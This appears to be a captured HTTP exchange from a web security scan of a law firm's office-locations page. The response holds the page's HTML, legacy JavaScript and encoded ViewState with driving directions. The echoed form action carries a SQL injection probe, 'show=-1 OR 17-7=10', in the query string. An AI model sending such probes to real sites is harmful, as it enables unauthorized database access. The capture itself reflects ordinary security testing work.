hlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEAq44RzBhw7T%2fELP%2b0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:43:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33451



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">
P,TD,DIV,SPAN {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
FONT {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
body {
<!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;-->
scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff;
}
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="Margin-left:0;Margin-top:10;margin-bottom:0">
<form name="Form1" method="post" action="showlocationnew.aspx?show=-1+OR+17-7%3d10" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM+Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA+O2k8MT47PjtsPHQ8O2w8aTwzPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciBcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQyNiIgYmlvc25ldy5hc3B4P1NlYXJjaD0nVHJ1ZSZhbXBcO0xvY2F0aW9uPTI1MzAiJyB3d3cyIHd3dy5tY2NhcnRlci5jb20gaHR0cDpcPk5FV0FSSyZuYnNwXDtPZmZpY2UgTGF3eWVyc1w8L2FcPlw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8Zm9vIGZhY2U9QXJpYWwsSGVsdmV0aWNhIHNpemU9Mlw+XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gdGhlIE5FV0FSSyBPZmZpY2U6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBmYWNlPUFyaWFsLEhlbHZldGljYSBzaXplPTJcPlw8c3Ryb25nXD5Gcm9tIHBvaW50cyBpbiBOZXcgSmVyc2V5Olw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8c3Ryb25nXD5HYXJkZW4gU3RhdGUgUGFya3dheTogXDwvc3Ryb25nXD5UYWtlIFw8Zm9vIHNpemU9Mlw+R2FyZGVuIFN0YXRlIFBhcmt3YXkgdG8gRXhpdCAxNDUuIEZvbGxvdyBzaWducyZuYnNwXDtvbnRvJm5ic3BcO1J0IDI4MCBFYXN0LiBXaGVuIDI4MCBmb3JrcyAtIHN0YXkgcmlnaHQsIGZvbGxvd2luZyBzaWducyBmb3IgSGFycmlzb24uIEV4aXQgYXQgMTUgKFJ0LiAyMSBTb3V0aC1Eb3dudG93bikuIFByb2NlZWQgdG8gdGhlIGJvdHRvbSBvZiB0aGUgcmFtcC4gVHVybiByaWdodCBvbnRvIFJ0LiAyMSAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIHByb2NlZWQgMSBtaWxlIHRvIHRoZSBpbnRlcnNlY3Rpb24gTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0LiZuYnNwXDsgVHVybiByaWdodCBhdCB0aGUgaW50ZXJzZWN0aW9uIG9udG8gKE1hcmtldCBTdHJlZXQpJm5ic3BcOyBQcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyZuYnNwXDtyaWdodCBhdCB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuIChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGxvY2F0ZWQganVzdCZuYnNwXDtiZWZvcmUgdGhlIG5leHQgdHJhZmZpYyBsaWdodCkuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2smbmJzcFw7eW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycmbmJzcFw7cGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCZuYnNwXDt0byB0aGUmbmJzcFw7MTV0aCBmbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPHN0cm9uZ1w+Um91dGUgNzgvMjQgRWFzdDpcPC9zdHJvbmdcPiBcPGZvbyBzaXplPTJcPkZvbGxvdyBzaWducyBmb3IgTmV3YXJrIEFpcnBvcnQsIEV4aXQgNTcuIEZvbGxvdyBzaWducyBmb3IgZm9yIFJvdXRlIDIxIOKAkyBOZXdhcmssJm5ic3BcO292ZXIgYnJpZGdlIG9udG8gUm91dGUgMjEgTm9ydGggd2hpY2ggYmVjb21lcyBNY0NhcnRlciBIaWdod2F5LiBQcm9jZWVkIGFwcHJveGltYXRlbHkgMSYjMTg5XDsgbWlsZXMgdG8gdGhlIGludGVyc2VjdGlvbiBvZiBNY0NhcnRlciBIaWdod2F5LyBFZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBvbnRvIChFZGlzb24gUGxhY2UpIGFuZCBwcm9jZWVkIHRvJm5ic3BcO3RoZSBuZXh0IHRyYWZmaWMgbGlnaHQgd2hpY2ggaXMmbmJzcFw7KE11bGJlcnJ5IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvIE11bGJlcnJ5IFN0cmVldCBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBpbnRlcnNlY3Rpb24gd2hpY2ggaXMoIE11bGJlcnJ5IFN0cmVldC9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IHR1cm4mbmJzcFw7b250byAoTWFya2V0KSZuYnNwXDthbmQgYmVhciBkaWFnb25hbGx5IGFjcm9zcyZuYnNwXDt0b3dhcmRzIHlvdXIgbGVmdCZuYnNwXDt0byBnZXQgaW50byB0aGUgbGVmdCBoYW5kIHR1cm4gbGFuZS4mbmJzcFw7IE1ha2UgYSBsZWZ0IHR1cm4mbmJzcFw7aW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPlJvdXRlIDMgb3IgUm91dGUgMjE6IFw8L3N0cm9uZ1w+XDwvZm9vXD5cPGZvbyBzaXplPTJcPkZyb20gUnQuIDMsIHRha2UgUm91dGUgMjEgU291dGggYWJvdXQgNCBtaWxlcyBhbmQgdGhlbiBSb3V0ZSAyMSBiZWNvbWVzIGEgNC1sYW5lIG5vbi1kaXZpZGVkIGhpZ2h3YXkuIEZyb20gdGhpcyBwb2ludCwgcHJvY2VlZCAxJiMxODlcOyBtaWxlcyB0byB0aGUgaW50ZXJzZWN0aW9uIG9mIE1jQ2FydGVyIEhpZ2h3YXkvTWFya2V0IFN0cmVldC4gVHVybiByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkmbmJzcFw7IFByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIG1vdXRoIG9mIHRoZSByZWFyIGRyaXZld2F5IGVudHJhbmNlLiZuYnNwXDsoVGhlIGVudHJhbmNlIHRvIHRoZSZuYnNwXDtkcml2ZXdheSZuYnNwXDtpcyBsb2NhdGVkIGp1c3QmbmJzcFw7YmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDtBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPGJyXD5cPGJyXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPkZyb20gUGVubnN5bHZhbmlhIG9yIFdlc3Rlcm4gTkogdmlhIFJ0LiA4MCBFYXN0Olw8L3N0cm9uZ1w+XDwvZm9vXD5cPC9wXD4NClw8cFw+XDxmb28gc2l6ZT0yXD5Sb3V0ZSA4MCBFYXN0IG9udG8gUm91dGUgMjgwIEVhc3QuIFByb2NlZWQgYXBwcm94aW1hdGVseSAxNCBtaWxlcyB1bnRpbCBSb3V0ZSAyODAgZm9ya3MuIEZvbGxvdyBzaWducyB0YWtpbmcgSS0yODAgRWFzdC4gV2hlbiBSb3V0ZSAyODAgZm9ya3MgLS0gc3RheSByaWdodCwgZm9sbG93aW5nIHNpZ25zIGZvciBIYXJyaXNvbi4gRXhpdCBhdCAxNSAoUnQuIDIxIFNvdXRoLURvd250b3duKS4gUHJvY2VlZCB0byB0aGUgYm90dG9tIG9mIHRoZSByYW1wLiBUdXJuIHJpZ2h0IG9udG8gUnQuIDIxIChNY0NhcnRlciBIaWdod2F5KSBhbmQgcHJvY2VlZCAxIG1pbGUgdG8gdGhlJm5ic3BcO2ludGVyc2VjdGlvbiBvZiggTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IGF0IHRoZSBsaWdodCBvbnRvIChNYXJrZXQgU3RyZWV0KSZuYnNwXDsgUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDE1MCBmZWV0IHR1cm5pbmcgcmlnaHQgaW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuXDwvZm9vXD5cPC9wXD4NClw8cFw+XDxzdHJvbmdcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5Gcm9tIFBlbm5zeWx2YW5pYSBvciBXZXN0ZXJuIE5KIHZpYSBSdC4mbmJzcFw7NzggRWFzdDpcPC9mb29cPiBcPC9zdHJvbmdcPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIHNpemU9Mlw+XDxmb28gc2l6ZT0yXD5cPGZvbyBzaXplPTJcPlJ0XDwvZm9vXD5cPC9zbWFsbFw+LiA3OCBFYXN0LiBGb2xsb3cgc2lnbnMgZm9yIE5ld2FyayBBaXJwb3J0LCBFeGl0IDU3LiBGb2xsb3cgc2lnbnMgZm9yIGZvciBSb3V0ZSAyMSDigJMgTmV3YXJrLCZuYnNwXDtvdmVyIGJyaWRnZSBvbnRvIFJvdXRlIDIxIE5vcnRoIHdoaWNoIGJlY29tZXMgTWNDYXJ0ZXIgSGlnaHdheS4gUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDEmIzE4OVw7IG1pbGVzIHRvIHRoZSBpbnRlcnNlY3Rpb24gb2YgTWNDYXJ0ZXIgSGlnaHdheS9FZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBhdCB0aGUgbGlnaHQgb250byAoRWRpc29uIFBsYWNlKSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCZuYnNwXDt0cmFmZmljIGxpZ2h0IHdoaWNoIGlzIChNdWxiZXJyeSBTdHJlZXQpJm5ic3BcOyBNYWtlIGEgcmlnaHQgb250byAoTXVsYmVycnkgU3RyZWV0KSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBsaWdodCB3aGljaCBpcyAoTWFya2V0IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvJm5ic3BcOyhNYXJrZXQgU3RyZWV0KSBhbmQmbmJzcFw7YmVhciBkaWFnb25hbGx5IGFjcm9zcyB0b3dhcmRzIHlvdXIgbGVmdCB0byBnZXQgaW50byB5b3VyIGxlZnQgaGFuZCB0dXJuIGxhbmUuJm5ic3BcOyBNYWtlIGEgbGVmdCBpbnRvIHRoZSZuYnNwXDttb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IEEgc2VjdXJpdHkgb2ZmaWNlciB3aWxsIG1lZXQgeW91IGF0IHlvdXIgdmVoaWNsZSB0byZuYnNwXDtjaGVjayB5b3VyIHNlY3VyaXR5IGNyZWRlbnRpYWxzLiZuYnNwXDsgUGxlYXNlIHBhcmsgeW91ciB2ZWhpY2xlIGluIHRoZSBvdXRkb29yIHZpc2l0b3JzJyBwYXJraW5nIGxvdC4mbmJzcFw7IFBsZWFzZSBwcm9jZWVkIHRvIHRoZSAxNXRoIEZsb29yIFJlY2VwdGlvbiBEZXNrLCBHYXRld2F5IElWLiZuYnNwXDtcPC9mb29cPlw8L3NtYWxsXD5cPC9mb29cPlw8L3BcPlw8Zm9vIHNpemU9Mlw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gY29sb3I9IzAwMDA4MCBzaXplPTRcPlw8c3Ryb25nXD5Gcm9tIE5ldyBZb3JrIENpdHk6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBIb2xsYW5kIFR1bm5lbDogXDwvc3Ryb25nXD5UYWtlIHRoZSBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+SG9sbGFuZCBUdW5uZWwgdG8gTmV3IEplcnNleSBUdXJucGlrZSBOb3J0aCB0byBFeGl0IDE1VyAtIG9udG8gUm91dGUgMjgwIFdlc3QuIENvbnRpbnVlIGFwcHJveGltYXRlbHkgMiYjMTg5XDsgbWlsZXMgdG8gZXhpdCAxNSAtIFJvdXRlIDIxIFNvdXRoLU5ld2Fyay4gUHJvY2VlZGluZyBkb3duIGV4aXQgcmFtcCBzdGF5IHRvIHlvdXIgbGVmdCBmb2xsb3dpbmcgc2lnbnMgZm9yIFJ0LiAyMSBTb3V0aCBhbmQgdGhlIE4uIEouIFBlcmZvcm1pbmcgQXJ0cyBDZW50ZXIgKHNoYXJwIGN1cnZlIHRvIHRoZSBsZWZ0KSB0byBib3R0b20gb2YgcmFtcC4gVHVybiByaWdodCAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIGNvbnRpbnVlIGFwcHJveGltYXRlbHkgMSBtaWxlIHRvIGludGVyc2VjdGlvbiBvZiZuYnNwXDsoTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsmbmJzcFw7IE1ha2UgYSByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkgYW5kIHByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuJm5ic3BcO1w8L2Zvb1w+XDwvcFw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBMaW5jb2xuIFR1bm5lbDpc